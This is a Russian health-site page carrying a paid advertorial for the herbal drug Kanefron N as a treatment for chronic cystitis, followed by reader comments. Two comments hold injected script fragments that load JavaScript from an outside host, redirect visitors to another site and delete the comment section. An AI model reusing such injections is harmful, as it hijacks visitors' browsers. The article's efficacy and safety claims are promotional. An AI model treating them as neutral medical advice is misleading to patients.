Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хронический цистит: смири...  >>  Хронический цистит: смириться или победить?
 
Обратная связь
 

Хронический цистит: смириться или победить?

Размер шрифта
22 октября 2012 00:00
  • google_analytics: false
  • Нравится

Существует мнение, что появившись однажды, цистит остается навсегда. Поэтому он стал «привычным» недугом для миллионов женщин. К счастью, не все согласны с этим утверждением, например, те, кто знаком с препаратом Канефрон®Н.

канефрон

Что такое цистит

Цистит – воспаление слизистой оболочки мочевого пузыря – считается типичным «женским недугом». Это объясняется тем, что у женщин, по сравнению с мужчинами, более короткий и широкий мочеиспускательный канал, поэтому инфекции легче попасть в мочевой пузырь. Цистит относится к таким заболеваниям, которые при неправильном лечении возвращаются снова и снова, со временем приобретая хроническое течение.

Наиболее частыми возбудителями цистита являются кишечная палочка (Escherichia coli) – 70-90% и стафилококк (Staphylococcus saprophyticus) – 10-12%. Однако наличие микробов в мочевом пузыре еще не достаточно для развития цистита. Пусковым механизмом заболевания являются различные «сопутствующие» факторы, такие как недостаточная интимная гигиена, нарушение диеты и пр.

Как лечить цистит

Стандартной терапией острого цистита является прием антибиотиков. Однако для предотвращения рецидивов и полного излечения этого бывает недостаточно. Поэтому врачи рекомендуют включать в комплексную терапию, на всех стадиях болезни, препараты, системно воздействующие на мочевыделительную систему. Наиболее щадящей и при этом эффективной признана фитотерапия. Растительные препараты действуют мягко, способствуя устранению боли и спазмов, нормализуют мочеиспускание. В урологической практике хорошо известны целебные свойства золототысячника, розмарина  и любистока. На их основе в Германии был создан растительный препарат Канефрон®Н.

Как действует Канефрон®Н

Благодаря своему составу и применению современных технологий производства Канефрон®Н обладает выраженным противовоспалительным, бактерицидным и легким мочегонным действиями. Он повышает эффективность лечения антибиотиками, и снижает риск повторных обострений хронического цистита. При этом обладает хорошей переносимостью, и рекомендован к длительному применению, как в сочетании с антибактериальными препаратами, так и в качестве средства профилактики.

Известно, что секрет успешного лечения хронического цистита заключается в длительной противорецидивной терапии. Именно здесь раскрываются преимущества применения препарата Канефрон®Н. Многочисленными исследованиями доказано, что он эффективен в лечении и профилактике цистита и безопасен при длительном применении.

Канефрон®Н применяют не только для лечения хронического цистита. Его с успехом используют в комплексной терапии таких заболеваний, как мочекаменная болезнь и пиелонефрит.

Канефрон®Н имеет высокий профиль безопасности и может применяться у беременных по назначению врача.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 октября 2012 в 18:51

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 21:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - Гость

11 ноября 2015 в 11:18

Цитировать   |   Пожаловаться

Кажется вариант "смирится" для хронического цистита подходит. Беречься, не простужаться и заменить антибиотики на эко-антибиотики, чтобы в процессе лечения цистита не обзавестись еще и молочницей))

5 - Мирошка

24 июня 2016 в 17:55

Цитировать   |   Пожаловаться

Не стоит мириться, а стоит найти хорошего врача и лечиться. Более того, женщинам нужно ещё помимо уролога, обратиться к гинекологу и у него проверится. Т.к. всё это взаимосвязано. Я сама  лечила хронический цистит в Москве, в ТН-Клинике. На лечение ушло несколько месяцев. Перед лечением было проведено обследование, я сдавала кучу анализов мочи, делали мне УЗИ и цистоскопию и вот после этого уже было понятно что у меня именно за проблема и врач назначал лечение. Спасибо урологу  Ткаченко  и гинекологу Сизовой Л.В.

Статьи

       
Расстройства мочеиспускания и возраст: есть ли связь?   Оказывается, мочой нельзя мыться! Как же быть?   Недержание мочи   Симптомы и признаки гиперактивного мочевого пузыря  
27 ноября 2012Ботокс помогает при недержании мочи 13 сентября 2012Ночные походы в туалет приведут к остановке дыхания!
 
26 февраля 2013Ученые создают мозговые клетки из мочи 20 февраля 2013Струя мочи расскажет все о здоровье мужчины
 

Слайдшоу

1
Как работает мочевой пузырь?
Еда, которая заставляет нас бежать в туалет. Часть 1
Как не описаться в дороге

Тесты

1
Есть ли у вас симптомы гиперактивного мочевого пузыря?
Что скрывает ваша моча?
Цистит: как с ним бороться
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.